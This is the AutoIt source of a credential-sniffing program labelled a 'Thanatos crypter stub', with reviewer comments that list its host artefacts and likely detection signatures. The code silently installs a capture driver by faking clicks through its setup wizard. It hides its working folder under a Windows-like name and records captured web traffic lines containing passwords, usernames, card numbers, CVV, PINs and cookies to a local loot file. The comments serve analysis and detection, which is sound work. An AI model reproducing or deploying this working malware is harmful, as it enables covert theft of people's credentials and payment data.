- #NoTrayIcon
- #Region ;**** Directives created by AutoIt3Wrapper_GUI ****
- #AutoIt3Wrapper_Outfile=sniffer.exe
- #AutoIt3Wrapper_Compression=4
- #AutoIt3Wrapper_UseUpx=y
- #AutoIt3Wrapper_Res_Language=1033
- #AutoIt3Wrapper_Res_requestedExecutionLevel=asInvoker
- #AutoIt3Wrapper_Run_Tidy=y
- #Tidy_Parameters=/gd /reel /sci 0 /kv 5 /sf
- #AutoIt3Wrapper_Tidy_Stop_OnError=n
- #AutoIt3Wrapper_Run_Au3Stripper=y
- #Au3Stripper_Parameters=/so /mi 5 /mo
- #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
- #include <Crypt.au3>
- ;==============================================;
- ; Thanatos AutoIt Crypter stub By Freak ;
- ; Coded By Freak ;
- ; Thanks to M3 for GUI ;
- ; Keep Credits if you Using Source ;
- ;==============================================;
- ; Start-up configuration. The values below are the host artefacts this script creates or depends on:
- ; a directory under the per-user application-data folder, a log file inside it, and a named kernel object.
- Opt("ExpandEnvStrings", 1)
- ; Working directory; installPCAP() later creates it and marks it System + Hidden.
- Global $installdir = @AppDataDir & '\Windows Shell Common Binary'
- ; Log file that receives every captured line matching the keyword list (written by the main loop).
- Global $lootLoc = $installdir & "\dump.dat"
- ; Capture filter: TCP on ports 80, 8080, 8888 and 8181 only. Port 443 is not listed, so the script only
- ; ever sees payloads that travel unencrypted; TLS-protected traffic is outside what this filter selects.
- Global $sniffopt = "tcp port (80 or 8080 or 8888 or 8181)"
- ; Name of the single-instance marker, decoded from a fixed hex blob. _Singleton() strips backslashes from it
- ; and creates a named semaphore with the result, so the object name is constant across runs of this build.
- Global Const $sMutex = BinaryToString("0x1337FF207F2838EEEBD6E4F2EF23323727FAEDCBECFE31263F25D4F1C6E4F0EF2A343225E9EFD0E6FF7A2B2125E4E5D0E8F137253F41FF1337")
- ; Exits the process (flag defaults to 0) when another instance already holds the object.
- _Singleton($sMutex)
- ; Capture-driver bootstrap. When wpcap.dll is absent from the system directory, the script downloads the
- ; WinPcap 4.1.3 installer to the temp directory, launches it and answers the setup wizard itself with
- ; synthetic keystrokes and a button click, so no user decision is involved in the driver install.
- ; Observable on the host: an outbound request for the installer URL below, WinPcap_4_1_3.exe appearing in
- ; the temp directory, the "WinPcap 4.1.3 Setup" window being driven without user input, and wpcap.dll
- ; appearing in the system directory afterwards.
- If Not FileExists(@SystemDir & "\wpcap.dll") Then
- InetGet("https://www.winpcap.org/install/bin/WinPcap_4_1_3.exe", @TempDir & "\WinPcap_4_1_3.exe")
- Run(@TempDir & "\WinPcap_4_1_3.exe")
- ; Welcome page: Alt+N.
- WinWaitActive("WinPcap 4.1.3 Setup", "Welcome to the WinPcap")
- Send("!n")
- ; License page: Alt+A.
- WinWaitActive("WinPcap 4.1.3 Setup", "License Agreement")
- Send("!a")
- ; Options page: clicks the second Button control of the dialog.
- WinWaitActive("WinPcap 4.1.3 Setup", "Installation options")
- ControlClick("WinPcap 4.1.3 Setup", "Installation options", "[CLASS:Button; INSTANCE:2]")
- ; Final page: Alt+F.
- WinWaitActive("WinPcap 4.1.3 Setup", "Completing the WinPcap")
- Send("!f")
- EndIf
- ; Prepare the hidden working directory, open wpcap.dll and start the live capture.
- ; Despite its name, installPCAP() only creates $installdir and sets its System + Hidden attributes.
- installPCAP()
- $winpcap = _PcapSetup()
- $pcap_devices = _PcapGetDeviceList()
- ; Only the first enumerated adapter (index 0) is ever captured on.
- $iface = 0
- ; Filter is "host <column 7 of the device row> and <$sniffopt>"; _PcapGetDeviceList() stores the adapter's
- ; short-form (IPv4-length) address in column 7. Arguments after the filter: promiscuous = 0,
- ; snapshot length 65536, buffer size 2 ^ 24, realtime = 0.
- $pcap = _PcapStartCapture($pcap_devices[$iface][0], "host " & $pcap_devices[$iface][7] & " and " & $sniffopt, 0, 65536, 2 ^ 24, 0)
- ; Substrings searched for in each decoded payload. A payload line containing any of them is written to
- ; the log file by the main loop. The list covers HTTP request lines and headers (0-4, 19), login form
- ; fields (5-12), payment-card style fields (13-16) and two free-text terms (17-18).
- ; Matching uses StringInStr with its default arguments in the main loop.
- ; NOTE(review): these literals, together with the directory and file names above, are the obvious
- ; candidates for a static signature on the script source - confirm they survive in the compiled build.
- Dim $keywords[20]
- $keywords[0] = "GET /"
- $keywords[1] = "POST /"
- $keywords[2] = "Host: "
- $keywords[3] = "User-Agent: "
- $keywords[4] = "Content-"
- $keywords[5] = "password="
- $keywords[6] = "user_name="
- $keywords[7] = "user="
- $keywords[8] = "Username="
- $keywords[9] = "User="
- $keywords[10] = "login="
- $keywords[11] = "email="
- $keywords[12] = "username="
- $keywords[13] = "holder="
- $keywords[14] = "number="
- $keywords[15] = "cvv="
- $keywords[16] = "pin="
- $keywords[17] = "transaction"
- $keywords[18] = "bank"
- $keywords[19] = "Cookie: "
- ; Main capture loop. Takes one parsed packet at a time from _TCP_Recv(), decodes its payload to text and
- ; appends every payload line that contains one of $keywords to the log file at $lootLoc.
- ; The log is only written locally: no statement on this page transmits or reads it back, so any
- ; collection of dump.dat would have to be done by something not shown here.
- ; Mode 1 opens the log for appending, so the file grows across runs.
- $lootHandle = FileOpen($lootLoc, 1)
- $sPacketText = ""
- $oldPacketText = ""
- While True
- $aPacket = _TCP_Recv($pcap)
- ; _TCP_Recv() returns a 21-element array on success and -1 on timeout; only the array case passes here.
- If UBound($aPacket) > 20 Then
- ; Element 20 is the hex string of the TCP payload; convert it to text.
- $sPacketText = BinaryToString("0x" & $aPacket[20])
- ; Skip a payload identical to the previous one and pause 250 ms before polling again.
- If $sPacketText = $oldPacketText Then
- Sleep(250)
- ContinueLoop
- EndIf
- ; Ignore payloads of 13 characters or fewer.
- If StringLen($sPacketText) > 13 Then
- For $key = 0 To UBound($keywords) - 1
- If StringInStr($sPacketText, $keywords[$key]) Then
- ; Element 14 is the destination-port field. NOTE(review): this looks intended to stop processing
- ; a packet addressed to port 6667; whether the Hex/Dec conversion of the decoded string actually
- ; yields the port number is not established by this page - confirm before relying on it.
- If Dec(Hex(BinaryToString("0x" & $aPacket[14]))) = 6667 Then ExitLoop
- ; Normalise line endings, split the payload into lines and log each line holding the keyword.
- $aPacketText = StringSplit(StringReplace($sPacketText, @CR, ""), @LF)
- For $aPT = 1 To UBound($aPacketText) - 1
- If StringInStr($aPacketText[$aPT], $keywords[$key]) Then
- FileWriteLine($lootHandle, $aPacketText[$aPT])
- ; Flushed after every line, so the file on disk is current even if the process is killed.
- FileFlush($lootHandle)
- $oldPacketText = $sPacketText
- EndIf
- Next
- $oldPacketText = $sPacketText
- Else
- ; Runs once per keyword that does not match, so one payload can be echoed several times.
- ConsoleWrite($sPacketText & @CRLF)
- EndIf
- Next
- EndIf
- EndIf
- $oldPacketText = $sPacketText
- WEnd
- ; Enumerates capture adapters through pcap_findalldevs_ex and returns one row of 14 columns per adapter,
- ; or -1 when the DllCall fails or the function reports -1.
- ; Columns as filled below: 0 name, 1 description, 2-4 link type (number, name, description), 5 speed,
- ; 6 MAC address, 7-9 the three address fields when their text is 7 to 15 characters long,
- ; 10-12 the same three fields when their text is longer than 15 characters, 13 adapter flags.
- ; Relies on the globals $Pcap_dll and $Pcap_errbuf created by _PcapSetup().
- Func _PcapGetDeviceList()
- Local $alldevs = DllStructCreate("ptr")
- Local $r = DllCall($Pcap_dll, "int:cdecl", "pcap_findalldevs_ex", "str", "rpcap://", "ptr", 0, "ptr", DllStructGetPtr($alldevs), "ptr", DllStructGetPtr($Pcap_errbuf))
- If (@error > 0) Then Return -1
- If $r[0] = -1 Then Return -1
- ; $next walks the linked list of adapter records returned by the library.
- Local $next = DllStructGetData($alldevs, 1)
- Local $list[1][14]
- Local $i = 0
- While ($next <> 0)
- Local $pcap_if = DllStructCreate("ptr next;ptr name;ptr desc;ptr addresses;uint flags", $next)
- ; Measure the C strings first so a char[] overlay of the right size can copy them out.
- Local $len_name = DllCall("kernel32.dll", "int", "lstrlen", "ptr", DllStructGetData($pcap_if, 2))
- Local $len_desc = DllCall("kernel32.dll", "int", "lstrlen", "ptr", DllStructGetData($pcap_if, 3))
- $list[$i][0] = DllStructGetData(DllStructCreate("char[" & ($len_name[0] + 1) & "]", DllStructGetData($pcap_if, 2)), 1)
- $list[$i][1] = DllStructGetData(DllStructCreate("char[" & ($len_desc[0] + 1) & "]", DllStructGetData($pcap_if, 3)), 1)
- Local $next_addr = DllStructGetData($pcap_if, "addresses")
- ; Drop the first 8 characters of the name (the length of the "rpcap://" prefix used above) before
- ; handing the adapter name to packet.dll.
- Local $device = StringTrimLeft($list[$i][0], 8)
- Local $snames = DllStructCreate("char Name[" & (StringLen($device) + 1) & "]")
- DllStructSetData($snames, 1, $device)
- Local $handle = DllCall("packet.dll", "ptr:cdecl", "PacketOpenAdapter", "ptr", DllStructGetPtr($snames))
- If IsPtr($handle[0]) Then
- ; OID request with a 6-byte result buffer; the reply is formatted as a MAC address below.
- Local $packetoiddata = DllStructCreate("ulong oid;ulong length;ubyte data[6]")
- DllStructSetData($packetoiddata, 1, 0x01010102)
- DllStructSetData($packetoiddata, 2, 6)
- Local $status = DllCall("packet.dll", "byte:cdecl", "PacketRequest", "ptr", $handle[0], "byte", 0, "ptr", DllStructGetPtr($packetoiddata))
- If $status[0] Then
- Local $mac = DllStructGetData($packetoiddata, 3)
- ; $mac is a "0x..." hex string; take the six byte pairs after the prefix and join them with colons.
- $list[$i][6] = StringMid($mac, 3, 2) & ":" & StringMid($mac, 5, 2) & ":" & StringMid($mac, 7, 2) & ":" & StringMid($mac, 9, 2) & ":" & StringMid($mac, 11, 2) & ":" & StringMid($mac, 13, 2)
- EndIf
- Local $nettype = DllStructCreate("uint type;uint64 speed")
- $status = DllCall("packet.dll", "byte:cdecl", "PacketGetNetType", "ptr", $handle[0], "ptr", DllStructGetPtr($nettype))
- If $status[0] Then
- $list[$i][5] = DllStructGetData($nettype, 2)
- EndIf
- DllCall("packet.dll", "none:cdecl", "PacketCloseAdapter", "ptr", $handle[0])
- EndIf
- ; Short throw-away capture (placeholder filter, 32-byte snapshot) opened only to query the link type.
- Local $pcap = _PcapStartCapture($list[$i][0], "host 1.2.3.4", 0, 32)
- If IsPtr($pcap) Then
- Local $types = _PcapGetLinkType($pcap)
- If IsArray($types) Then
- $list[$i][2] = $types[0]
- $list[$i][3] = $types[1]
- $list[$i][4] = $types[2]
- EndIf
- _PcapStopCapture($pcap)
- EndIf
- ; Walk the adapter's address list; fields 2 to 4 of each record are addr, netmask and broadaddr.
- While $next_addr <> 0
- Local $pcap_addr = DllStructCreate("ptr next;ptr addr;ptr netmask;ptr broadaddr;ptr dst", $next_addr)
- Local $j, $addr
- For $j = 2 To 4
- $addr = _PcapSock2addr(DllStructGetData($pcap_addr, $j))
- ; Text length decides the column group: longer than 15 goes to 10-12, 7 to 15 goes to 7-9.
- If StringLen($addr) > 15 Then
- $list[$i][$j + 8] = $addr
- ElseIf StringLen($addr) > 6 Then
- $list[$i][$j + 5] = $addr
- EndIf
- Next
- $next_addr = DllStructGetData($pcap_addr, 1)
- WEnd
- $list[$i][13] = DllStructGetData($pcap_if, 5)
- $next = DllStructGetData($pcap_if, 1)
- $i += 1
- ; Grow the result by one row only when another adapter follows.
- If $next <> 0 Then ReDim $list[$i + 1][14]
- WEnd
- DllCall($Pcap_dll, "none:cdecl", "pcap_freealldevs", "ptr", DllStructGetData($alldevs, 1))
- Return $list
- EndFunc ;==>_PcapGetDeviceList
- ; Returns a 3-element array describing the link layer of an open capture:
- ; [0] value from pcap_datalink, [1] its name, [2] its description. Returns -1 when $pcap is not a pointer.
- Func _PcapGetLinkType($pcap)
- If Not IsPtr($pcap) Then Return -1
- Local $type[3]
- Local $t = DllCall($Pcap_dll, "int:cdecl", "pcap_datalink", "ptr", $pcap)
- $type[0] = $t[0]
- ; The numeric value is then translated twice: once to a short name, once to a description.
- Local $name = DllCall($Pcap_dll, "str:cdecl", "pcap_datalink_val_to_name", "int", $t[0])
- $type[1] = $name[0]
- Local $desc = DllCall($Pcap_dll, "str:cdecl", "pcap_datalink_val_to_description", "int", $t[0])
- $type[2] = $desc[0]
- Return $type
- EndFunc ;==>_PcapGetLinkType
- ; Fetches the next packet from an open capture via pcap_next_ex.
- ; Any result other than 1 from pcap_next_ex is returned to the caller unchanged.
- ; Side effects: overwrites the globals $Pcap_ptrhdr and $Pcap_ptrpkt and updates the running totals
- ; $Pcap_statV (bytes) and $Pcap_statN (packets).
- Func _PcapGetPacket($pcap) ; return 0: timeout, -1:error, -2:EOF in file or if successful array[0]=time [1]=captured len [2]=packet len [3]=packet data
- If Not IsPtr($pcap) Then Return -1
- ; Out-parameters that receive the header pointer and the data pointer from the library.
- $Pcap_ptrhdr = DllStructCreate("ptr")
- $Pcap_ptrpkt = DllStructCreate("ptr")
- Local $pk[4]
- Local $res = DllCall($Pcap_dll, "int:cdecl", "pcap_next_ex", "ptr", $pcap, "ptr", DllStructGetPtr($Pcap_ptrhdr), "ptr", DllStructGetPtr($Pcap_ptrpkt))
- If ($res[0] <> 1) Then Return $res[0]
- ; Overlay structs on the returned pointers; the byte array is sized by the captured length (field 3).
- Local $pkthdr = DllStructCreate("int s;int us;int caplen;int len", DllStructGetData($Pcap_ptrhdr, 1))
- Local $packet = DllStructCreate("ubyte[" & DllStructGetData($pkthdr, 3) & "]", DllStructGetData($Pcap_ptrpkt, 1))
- ; Seconds since midnight after applying $Pcap_timebias, formatted as HH:MM:SS.microseconds.
- Local $time_t = Mod(DllStructGetData($pkthdr, 1) + $Pcap_timebias, 86400)
- $pk[0] = StringFormat("%02d:%02d:%02d.%06d", Int($time_t / 3600), Int(Mod($time_t, 3600) / 60), Mod($time_t, 60), DllStructGetData($pkthdr, 2))
- $pk[1] = DllStructGetData($pkthdr, 3)
- $pk[2] = DllStructGetData($pkthdr, 4)
- $pk[3] = DllStructGetData($packet, 1)
- $Pcap_statV += $pk[2]
- $Pcap_statN += 1
- Return $pk
- EndFunc ;==>_PcapGetPacket
- ; Copies $data into a byte buffer and passes it to pcap_sendpacket on the given capture handle.
- ; Returns the library's result, or -1 when $pcap is not a pointer.
- ; No call to this function appears anywhere on this page; the visible script only reads traffic.
- Func _PcapSendPacket($pcap, $data) ; data in Binary Format
- If Not IsPtr($pcap) Then Return -1
- Local $databuffer = DllStructCreate("ubyte[" & BinaryLen($data) & "]")
- DllStructSetData($databuffer, 1, $data)
- Local $r = DllCall($Pcap_dll, "int:cdecl", "pcap_sendpacket", "ptr", $pcap, "ptr", DllStructGetPtr($databuffer), "int", BinaryLen($data))
- Return $r[0]
- EndFunc ;==>_PcapSendPacket
- ; Opens wpcap.dll from the system directory and declares the globals the other _Pcap* functions use.
- ; The DLL is loaded by full path, so only the copy in the system directory is used.
- Func _PcapSetup() ; return WinPCAP version as full text or -1 if winpcap is not installed, and opens dll
- If Not FileExists(@SystemDir & "\wpcap.dll") Then Return -1
- Global $Pcap_dll = DllOpen(@SystemDir & "\wpcap.dll")
- ; 256-byte buffer handed to the library for error text; also reused for "Filter: ..." messages.
- Global $Pcap_errbuf = DllStructCreate("char[256]")
- Global $Pcap_ptrhdr = 0
- Global $Pcap_ptrpkt = 0
- Global $Pcap_statV ; Total volume captured
- Global $Pcap_statN ; Total number of packets captured
- Global $Pcap_starttime ; Start time of Capture
- ; Offset in seconds added to packet timestamps, derived from the ActiveTimeBias registry value.
- ; NOTE(review): the 2 ^ 32 term presumably compensates for the value being read as unsigned - confirm.
- Global $Pcap_timebias = (2 ^ 32 - RegRead("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TimeZoneInformation", "ActiveTimeBias")) * 60
- Local $v = DllCall($Pcap_dll, "str:cdecl", "pcap_lib_version")
- If (@error > 0) Then Return -1
- Return $v[0]
- EndFunc ;==>_PcapSetup
- ; Converts a sockaddr pointer to text. Family 2 is rendered as four dot-separated decimal bytes,
- ; family 23 as eight colon-separated groups of four hex digits. A null pointer or any other family
- ; yields an empty string.
- Func _PcapSock2addr($sockaddr_ptr)
- If ($sockaddr_ptr = 0) Then Return ""
- ; Read the family field first to decide which layout to overlay on the same memory.
- Local $sockaddr = DllStructCreate("ushort family;char data[14]", $sockaddr_ptr)
- Local $family = DllStructGetData($sockaddr, 1)
- If ($family = 2) Then
- Local $sockaddr_in = DllStructCreate("short family;ushort port;ubyte addr[4];char zero[8]", $sockaddr_ptr)
- Return DllStructGetData($sockaddr_in, 3, 1) & "." & DllStructGetData($sockaddr_in, 3, 2) & "." & DllStructGetData($sockaddr_in, 3, 3) & "." & DllStructGetData($sockaddr_in, 3, 4)
- EndIf
- If ($family = 23) Then
- Local $sockaddr_in6 = DllStructCreate("ushort family;ushort port;uint flow;ubyte addr[16];uint scope", $sockaddr_ptr)
- ; $bin is a "0x..." hex string of the 16 address bytes; skip the prefix and cut it into 4-digit groups.
- Local $bin = DllStructGetData($sockaddr_in6, 4)
- Local $i, $ipv6
- For $i = 0 To 7
- $ipv6 &= StringMid($bin, 3 + $i * 4, 4) & ":"
- Next
- ; Remove the trailing colon left by the loop.
- Return StringTrimRight($ipv6, 1)
- EndIf
- Return ""
- EndFunc ;==>_PcapSock2addr
- ; Opens a live capture on $DeviceName and returns the capture handle, or -1 on failure.
- ;   $filter      - capture filter expression; compiled and applied when not empty
- ;   $promiscuous - passed to pcap_open as its flags argument
- ;   $PacketLen   - snapshot length passed to pcap_open
- ;   $buffersize  - passed to pcap_setbuff when greater than 0
- ;   $realtime    - when true, pcap_setmintocopy is called with 1
- ; On a filter error the message "Filter: <pcap error>" is stored in $Pcap_errbuf and the handle is closed.
- ; Side effects: resets $Pcap_statV and $Pcap_statN and restarts $Pcap_starttime.
- Func _PcapStartCapture($DeviceName, $filter = "", $promiscuous = 0, $PacketLen = 65536, $buffersize = 0, $realtime = 1)
- ; The literal 1000 is the fourth pcap_open argument (read timeout); the auth pointer is null.
- Local $handle = DllCall($Pcap_dll, "ptr:cdecl", "pcap_open", "str", $DeviceName, "int", $PacketLen, "int", $promiscuous, "int", 1000, "ptr", 0, "ptr", DllStructGetPtr($Pcap_errbuf))
- If (@error > 0) Then Return -1
- If ($handle[0] = 0) Then Return -1
- ; Non-blocking mode, so reads return immediately when no packet is queued.
- DllCall($Pcap_dll, "int:cdecl", "pcap_setnonblock", "ptr", $handle[0], "int", 1, "ptr", DllStructGetPtr($Pcap_errbuf))
- If ($filter <> "") Then
- Local $fcode = DllStructCreate("UINT;ptr")
- Local $comp = DllCall($Pcap_dll, "int:cdecl", "pcap_compile", "ptr", $handle[0], "ptr", DllStructGetPtr($fcode), "str", $filter, "int", 1, "int", 0)
- If ($comp[0] = -1) Then
- Local $v = DllCall($Pcap_dll, "str:cdecl", "pcap_geterr", "ptr", $handle[0])
- DllStructSetData($Pcap_errbuf, 1, "Filter: " & $v[0])
- _PcapStopCapture($handle[0])
- Return -1
- EndIf
- Local $set = DllCall($Pcap_dll, "int:cdecl", "pcap_setfilter", "ptr", $handle[0], "ptr", DllStructGetPtr($fcode))
- If ($set[0] = -1) Then
- Local $v = DllCall($Pcap_dll, "str:cdecl", "pcap_geterr", "ptr", $handle[0])
- DllStructSetData($Pcap_errbuf, 1, "Filter: " & $v[0])
- _PcapStopCapture($handle[0])
- Return -1
- ; This call follows the Return inside the error branch, so it never executes as written.
- DllCall($Pcap_dll, "none:cdecl", "pcap_freecode", "ptr", $fcode)
- EndIf
- EndIf
- If $buffersize > 0 Then DllCall($Pcap_dll, "int:cdecl", "pcap_setbuff", "ptr", $handle[0], "int", $buffersize)
- If $realtime Then DllCall($Pcap_dll, "int:cdecl", "pcap_setmintocopy", "ptr", $handle[0], "int", 1)
- $Pcap_statV = 0
- $Pcap_statN = 0
- $Pcap_starttime = TimerInit()
- Return $handle[0]
- EndFunc ;==>_PcapStartCapture
- ; Closes a capture handle with pcap_close. Does nothing when $pcap is not a pointer.
- Func _PcapStopCapture($pcap)
- If Not IsPtr($pcap) Then Return
- DllCall($Pcap_dll, "none:cdecl", "pcap_close", "ptr", $pcap)
- EndFunc ;==>_PcapStopCapture
- ; Single-instance guard built on a named kernel object.
- ; Creates a named semaphore (the CreateMutex variant is commented out) and checks whether it existed
- ; already. With $flag = 0 the process exits with code -1 when it did; with any other $flag the function
- ; sets @error to 183 and returns 0. Otherwise it returns the value CreateSemaphore returned.
- ; Because the name is fixed by the caller, the presence of a semaphore with that name is a host-level
- ; sign that an instance is running.
- Func _Singleton($occurenceName, $flag = 0)
- Local $ERROR_ALREADY_EXISTS = 183
- $occurenceName = StringReplace($occurenceName, "\", "") ; to avoid error
- Local $handle = DllCall("kernel32.dll", "int", "CreateSemaphore", "int", 0, "long", 1, "long", 1, "str", $occurenceName)
- ; Local $handle = DllCall("kernel32.dll", "int", "CreateMutex", "int", 0, "long", 1, "str", $occurenceName)
- ; The last-error value is fetched with a second, separate DllCall.
- Local $lastError = DllCall("kernel32.dll", "int", "GetLastError")
- If $lastError[0] = $ERROR_ALREADY_EXISTS Then
- If $flag = 0 Then
- Exit -1
- Else
- SetError($lastError[0]) ;<---flag <>0 so set @error to $ERROR_ALREADY_EXISTS
- Return 0
- EndIf
- EndIf
- Return $handle[0]
- EndFunc ;==>_Singleton
- ; Polls _PcapGetPacket() until a packet arrives or $iTimeOut milliseconds pass (-1 waits forever) and
- ; returns the packet cut into 21 hex-string fields, or -1 on timeout.
- ; $iInstance selects which captured packet to return, counted from 0.
- ; The slicing uses fixed character offsets into the "0x..." hex string of the frame: 14 bytes of
- ; Ethernet header, 20 bytes of IP header and 20 bytes of TCP header, with everything after those 54 bytes
- ; treated as payload. The offsets are fixed, so a frame with longer headers would put header bytes at
- ; the start of the payload field.
- Func _TCP_Recv($hCapture, $iInstance = 0, $iTimeOut = 3000)
- Local $blPacketCaptured = False, $iTimer_Capture, $aPacket, $iPacket
- $iTimer_Capture = TimerInit()
- While (TimerDiff($iTimer_Capture) < $iTimeOut Or $iTimeOut = -1)
- $aPacket = _PcapGetPacket($hCapture)
- ; _PcapGetPacket() returns an array only when a packet was read; numeric results mean "none yet".
- If IsArray($aPacket) Then
- If $iPacket = $iInstance Then
- Local $aTCPPacket[21]
- ; Positions are 1-based and start at 3 to skip the "0x" prefix; each byte is two characters.
- $aTCPPacket[0] = StringMid($aPacket[3], 3, 12) ;Destination Mac Address
- $aTCPPacket[1] = StringMid($aPacket[3], 15, 12) ;Source Mac Address
- $aTCPPacket[2] = StringMid($aPacket[3], 27, 4) ;Type
- $aTCPPacket[3] = StringMid($aPacket[3], 31, 2) ;Version & Header length
- $aTCPPacket[4] = StringMid($aPacket[3], 33, 2) ;Differentiated Services Field
- $aTCPPacket[5] = StringMid($aPacket[3], 35, 4) ;Total Length
- $aTCPPacket[6] = StringMid($aPacket[3], 39, 4) ;Identification
- $aTCPPacket[7] = StringMid($aPacket[3], 43, 4) ;Fragment offset
- $aTCPPacket[8] = StringMid($aPacket[3], 47, 2) ;Time to live
- $aTCPPacket[9] = StringMid($aPacket[3], 49, 2) ;Protocol
- $aTCPPacket[10] = StringMid($aPacket[3], 51, 4) ;Header checksum
- $aTCPPacket[11] = StringMid($aPacket[3], 55, 8) ;Source IP Address
- $aTCPPacket[12] = StringMid($aPacket[3], 63, 8) ;Destination IP Address
- $aTCPPacket[13] = StringMid($aPacket[3], 71, 4) ;Source port
- $aTCPPacket[14] = StringMid($aPacket[3], 75, 4) ;Destination port
- $aTCPPacket[15] = StringMid($aPacket[3], 79, 8) ;Sequence number
- $aTCPPacket[16] = StringMid($aPacket[3], 87, 8) ;Acknowledgment number
- $aTCPPacket[17] = StringMid($aPacket[3], 95, 4) ;Flags
- $aTCPPacket[18] = StringMid($aPacket[3], 99, 4) ;Window size value
- $aTCPPacket[19] = StringMid($aPacket[3], 103, 4) ;Checksum
- ; 110 characters = "0x" plus 54 header bytes; the remainder is the payload as hex text.
- $aTCPPacket[20] = StringTrimLeft($aPacket[3], 110) ;Data
- Return $aTCPPacket
- EndIf
- $iPacket += 1
- EndIf
- WEnd
- Return -1
- EndFunc ;==>_TCP_Recv
- ; Creates the working directory $installdir and sets its System and Hidden attributes ("+SH").
- ; Despite the name, nothing here installs a capture driver; that happens in the top-level script.
- ; With both attributes set, the folder is omitted from a default directory listing, so a host triage
- ; for it needs a listing that includes hidden and system items.
- Func installPCAP()
- DirCreate($installdir)
- FileSetAttrib($installdir, "+SH")
- EndFunc ;==>installPCAP